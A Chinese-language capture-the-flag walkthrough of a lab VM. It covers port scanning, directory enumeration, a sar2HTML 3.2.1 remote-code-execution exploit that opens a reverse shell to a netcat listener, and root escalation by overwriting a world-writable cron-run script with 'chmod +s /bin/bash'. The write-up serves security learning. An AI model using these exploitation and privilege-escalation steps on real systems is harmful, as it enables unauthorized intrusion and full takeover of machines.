主要知识点
- 路径枚举
- cronjob提权
具体步骤
nmap扫描,只开了一个80端口
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 19:13 CST
Nmap scan report for 172.16.33.13
Host is up (0.035s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.78 seconds
枚举一下路径,发现有phpinfo和robots.txt,而robots.txt里有sar2HTML路径
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.33.13
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.htaccess.php (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htpasswd.php (Status: 403) [Size: 277]
/phpinfo.php (Status: 200) [Size: 95390]
/robots.txt (Status: 200) [Size: 9]
/server-status (Status: 403) [Size: 277]
Progress: 40952 / 40954 (100.00%)
===============================================================
Finished
尝试访问一下sar2HTML,得知是3.2.1版本,搜索一下得知其有RCE漏洞
搜索相关信息,得到
https://github.com/Jsmoreira02/sar2HTML_exploit
直接利用它的shell_mode得到reverse shell
──(kali㉿Timothy)-[~/Documents/GooAnn/172.16.33.13]
└─$ python sar2html_exploit.py http://172.16.33.13/sar2HTML --shell_mode_____ _____ _ _ ________ ___ _ _____ _ _ _
/ ___| / __ \| | | |_ _| \/ || | | ___| | | (_) |
\ `--. __ _ _ __`' / /'| |_| | | | | . . || | ______| |____ ___ __ | | ___ _| |_ `--. \/ _` | '__| / / | _ | | | | |\/| || | |______| __\ \/ / '_ \| |/ _ \| | __|
/\__/ / (_| | | ./ /___| | | | | | | | | || |____ | |___> <| |_) | | (_) | | |_
\____/ \__,_|_| \_____/\_| |_/ \_/ \_| |_/\_____/ \____/_/\_\ .__/|_|\___/|_|\__|| | |_| [+] URL found! Starting shell upload...
------------------------------
LHOST= 10.8.0.204
LPORT= 80
------------------------------[+] Creating process...---> Server started http://127.0.0.1:8000
---> Listening on port 80Can't grab 0.0.0.0:80 with bind : Permission denied
[!] SHELL upload is possible in the target!Spawning your shell :)┌──(kali㉿Timothy)-[~/Documents/GooAnn/172.16.33.13]
└─$ sudo nc -nlvp 80
[sudo] password for kali:
listening on [any] 80 ...
connect to [10.8.0.204] from (UNKNOWN) [172.16.33.13] 53186
bash: cannot set terminal process group (774): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sudo -l和suid都没有什么有用的信息,上传Linpeas.sh并执行,得到
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
......
......这个finally.sh比较可疑,查看一下,看起来这个finally.sh会调用write.sh,而我们对于write.sh有写权限
www-data@sar:/var/www/html/sar2HTML$ cd /var/www/html/
cd /var/www/html/
www-data@sar:/var/www/html$ ls -l
ls -l
total 32
-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
-rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
drwxr-xr-x 4 www-data www-data 4096 Nov 16 16:07 sar2HTML
-rwxrwxrwx 1 www-data www-data 30 Nov 16 13:21 write.sh
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh./write.sh
修改write.sh,让其赋予/bin/bash SUID
www-data@sar:/var/www/html$ echo "chmod +s /bin/bash" >write.sh
echo "chmod +s /bin/bash" >write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
chmod +s /bin/bash
等几分钟后,提权成功
ww-data@sar:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1113504 Jun 7 2019 /bin/bash
www-data@sar:/var/www/html$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-4.4# cat /root/root.txt
cat /root/root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
bash-4.4# cat /home/love/Desktop/user.txt
cat /home/love/Desktop/user.txt
427a7e47deb4a8649c7cab38df232b52
bash-4.4#
 和 Alpha的区别)
)
)